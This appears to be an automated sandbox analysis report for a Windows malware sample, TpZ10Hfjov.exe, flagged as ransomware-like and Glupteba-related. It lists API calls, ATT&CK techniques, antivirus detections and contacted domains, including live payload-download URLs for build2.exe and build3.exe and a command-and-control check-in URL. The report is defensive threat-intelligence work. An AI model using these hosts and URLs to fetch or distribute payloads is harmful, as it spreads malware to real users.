            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1Scheduled Task/Job1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery2Taint Shared Content1Archive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder1Process Injection211Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScheduled Task/Job1Services File Permissions Weakness1Scheduled Task/Job1Software Packing22Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Masquerading1NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptServices File Permissions Weakness1Virtualization/Sandbox Evasion21LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection211Cached Domain CredentialsSecurity Software Discovery141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsServices File Permissions Weakness1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458803 Sample: TpZ10Hfjov.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 38 192.168.2.1 unknown unknown 2->38 40 api.2ip.ua 2->40 42 a-0019.a.dns.azurefd.net 2->42 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Antivirus detection for URL or domain 2->58 60 5 other signatures 2->60 9 TpZ10Hfjov.exe 2->9         started        12 TpZ10Hfjov.exe 2->12         started        signatures3 process4 signatures5 62 Detected unpacking (changes PE section rights) 9->62 64 Detected unpacking (overwrites its own PE header) 9->64 66 Contains functionality to inject code into remote processes 9->66 14 TpZ10Hfjov.exe 1 18 9->14         started        68 Injects a PE file into a foreign processes 12->68 process6 dnsIp7 50 api.2ip.ua 77.123.139.190, 443, 49733, 49741 VOLIA-ASUA Ukraine 14->50 36 C:\Users\...\TpZ10Hfjov.exe:Zone.Identifier, ASCII 14->36 dropped 18 TpZ10Hfjov.exe 14->18         started        21 icacls.exe 14->21         started        file8 process9 signatures10 52 Injects a PE file into a foreign processes 18->52 23 TpZ10Hfjov.exe 1 25 18->23         started        process11 dnsIp12 44 securebiz.org 187.170.252.73, 49743, 80 UninetSAdeCVMX Mexico 23->44 46 astdg.top 31.167.180.141, 49742, 49745, 80 MOBILY-ASEtihadEtisalatCompanyMobilySA Saudi Arabia 23->46 48 api.2ip.ua 23->48 28 C:\Users\user\AppData\Local\...\build3.exe, PE32 23->28 dropped 30 C:\Users\user\Desktop\...\BQJUWOYRTO.xlsx, data 23->30 dropped 32 C:\Users\user\Desktop\IZMFBFKMEB.pdf, data 23->32 dropped 34 28 other files (3 malicious) 23->34 dropped 70 Infects executable files (exe, dll, sys, html) 23->70 72 Modifies existing user documents (likely ransomware behavior) 23->72 file13 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            TpZ10Hfjov.exe33%VirustotalBrowse
            TpZ10Hfjov.exe37%ReversingLabsWin32.Trojan.Glupteba
            TpZ10Hfjov.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.1.TpZ10Hfjov.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
            3.2.TpZ10Hfjov.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
            8.2.TpZ10Hfjov.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
            8.1.TpZ10Hfjov.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://astdg.top/files/1/build3.exe$run0%Avira URL Cloudsafe
            http://astdg.top/files/1/build3.exe20%VirustotalBrowse
            http://astdg.top/files/1/build3.exe100%Avira URL Cloudmalware
            http://ocsp.digicert0%Avira URL Cloudsafe
            https://we.tl/t-CnI3tI6K0%Avira URL Cloudsafe
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
            http://securebiz.org/dl/build2.exe$run100%Avira URL Cloudmalware
            https://www.google.com;0%Avira URL Cloudsafe
            http://astdg.top/fhsgtsspen6/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true0%Avira URL Cloudsafe
            http://astdg.top/files/1/build3.exey0%Avira URL Cloudsafe
            http://ocsp.digicer0%Avira URL Cloudsafe
            http://securebiz.org/dl/build2.exe100%Avira URL Cloudmalware
            http://securebiz.org/dl/build2.exerun100%Avira URL Cloudmalware
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://ocsp.digic0%Avira URL Cloudsafe
            https://mths.be/fromcodepoint0%URL Reputationsafe
            http://ocsp.use0%URL Reputationsafe
            http://ocsp.digicert.0%Avira URL Cloudsafe
            http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
            http://crt.sectigo.com0%Avira URL Cloudsafe
            http://facebook.github.io/react/docs/error-decoder.html?invariant0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://astdg.top/files/1/build3.exerundd20%Avira URL Cloudsafe
            http://astdg.top/files/1/build3.exe10%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            astdg.top
            31.167.180.141
            truefalse
              high
              securebiz.org
              187.170.252.73
              truefalse
                high
                api.2ip.ua
                77.123.139.190
                truefalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://astdg.top/files/1/build3.exetrue
                  • 20%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://astdg.top/fhsgtsspen6/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://securebiz.org/dl/build2.exetrue
                  • Avira URL Cloud: malware
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ogs.google.com/TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                    high
                    http://searchads.msn.net/.cfm?&&kp=1&TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                      high
                      https://www.google.com/chrome/static/css/main.v2.min.cssTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                        high
                        https://apis.google.com/js/client.jsTpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpfalse
                          high
                          http://astdg.top/files/1/build3.exe$runTpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/favicon.ico~TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpfalse
                            high
                            https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                              high
                              https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                high
                                https://crash.corp.google.com/samples?reportid=&q=TpZ10Hfjov.exe, 00000008.00000003.739239627.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738992284.0000000002DF0000.00000004.00000001.sdmpfalse
                                  high
                                  https://mail.google.com/mail/#settingsTpZ10Hfjov.exe, 00000008.00000003.738809543.0000000002DF0000.00000004.00000001.sdmpfalse
                                    high
                                    https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=285df6c9c501a160c7a24c4f7b6cTpZ10Hfjov.exe, 00000008.00000003.702507447.0000000002DF0000.00000004.00000001.sdmpfalse
                                      high
                                      https://consent.google.com/TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                        high
                                        https://docs.google.com/TpZ10Hfjov.exe, 00000008.00000003.738539047.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.google.comTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                            high
                                            http://ocsp.digicertTpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contextual.media.net/__media__/pics/8000/70/955/fallback1.jpgTpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                high
                                                http://docs.google.com/TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://drive.google.com/TpZ10Hfjov.exe, 00000008.00000003.738539047.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://we.tl/t-CnI3tI6KTpZ10Hfjov.exe, 00000008.00000003.779851425.0000000000830000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.reddit.com/TpZ10Hfjov.exe, 00000008.00000003.674164777.00000000094E0000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://g.live.com/odclientsettings/Prod?OneDriveUpdate=1d0fd63eadbf9134b38130e8138TpZ10Hfjov.exe, 00000008.00000003.703913470.0000000002DF0000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.google.com/tools/feedbackTpZ10Hfjov.exe, 00000008.00000003.739100756.0000000002DF0000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.ecma-international.org/ecma-262/5.1/#sec-CTpZ10Hfjov.exe, 00000008.00000003.738685634.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738622122.0000000002DF0000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pTpZ10Hfjov.exe, 00000008.00000003.738685634.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738622122.0000000002DF0000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://consent.google.com/intro/?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.gTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/ProdTpZ10Hfjov.exe, 00000008.00000003.702917046.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://support.google.com/chromecast/troubleshooter/2995236TpZ10Hfjov.exe, 00000008.00000003.775856635.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739061098.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://www.google.com/?gws_rd=sslTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://payments.google.com/payments/v4/js/integrator.jsTpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://securebiz.org/dl/build2.exe$runTpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://www.google.com;TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          low
                                                                          https://www.google.com/?gws_rd=ssl#spf=1601450623139TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://www.google.com/chrome/static/images/app-store-download.pngTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=d580ab8fe35aabd7f368aa9277c8TpZ10Hfjov.exe, 00000008.00000003.703866297.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://www.google.com/favicon.icoTpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://api.2ip.ua/ZTpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://searchads.msn.net/.cfm?&&kp=2&TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.youtube.com/TpZ10Hfjov.exe, 00000008.00000003.674251727.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://astdg.top/files/1/build3.exeyTpZ10Hfjov.exe, 00000008.00000003.684472749.00000000091A1000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.digicerTpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://g.live.com/odclientsettings/Prod?OneDriveUpdate=33c6866dc61a418522d977bd7TpZ10Hfjov.exe, 00000008.00000003.702507447.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.google.comTpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://www.google.com/TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://feedback.googleusercontent.comTpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=4a941ab240f8b2c5ca3ca1b59bTpZ10Hfjov.exe, 00000008.00000003.702549433.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://clients6.google.comTpZ10Hfjov.exe, 00000008.00000003.739361295.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://securebiz.org/dl/build2.exerunTpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmptrue
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://docs.google.com/presentation?usp=chrome_app&authuser=0TpZ10Hfjov.exe, 00000008.00000003.729016253.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://ocsp.sectigo.com0TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://ocsp.digicTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.google.com/chrome/static/images/google-play-download.pngTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngTpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.amazon.com/TpZ10Hfjov.exe, 00000008.00000003.673825540.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contextual.media.net/__media__/pics/8000/70/955/fallback2.jpgTpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://mths.be/fromcodepointTpZ10Hfjov.exe, 00000008.00000003.722164796.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://sandbox.google.com/payments/v4/js/integrator.jsTpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.twitter.com/TpZ10Hfjov.exe, 00000008.00000003.674208862.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://ocsp.useTpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://mail.google.com/mailTpZ10Hfjov.exe, 00000008.00000003.738809543.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.openssl.org/support/faq.htmlTpZ10Hfjov.exe, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://docs.google.com/document?usp=chrome_app&authuser=0TpZ10Hfjov.exe, 00000008.00000003.729518150.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://ocsp.digicert.TpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://drive.google.com/drive/settingsTpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorTpZ10Hfjov.exe, 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://meet.google.comTpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/intl/en_uk/chrome/zGoogleTpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/intl/en_uk/chrome/TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://accounts.google.comTpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://clients2.google.com/cr/reportTpZ10Hfjov.exe, 00000008.00000003.739361295.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739239627.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://crt.sectigo.comTpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.google.com/?gws_rd=ssl2TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://angularjs.orgTpZ10Hfjov.exe, 00000008.00000003.738856480.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://contextual.media.net/__media__/pics/8000/72/941/fallback1.jpgTpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/angular/materialTpZ10Hfjov.exe, 00000008.00000003.739185547.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://apis.google.comTpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://facebook.github.io/react/docs/error-decoder.html?invariantTpZ10Hfjov.exe, 00000008.00000003.718962801.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.719001981.0000000002DF0000.00000004.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.nytimes.com/TpZ10Hfjov.exe, 00000008.00000003.674045133.00000000094E0000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://sectigo.com/CPS0TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpfalse
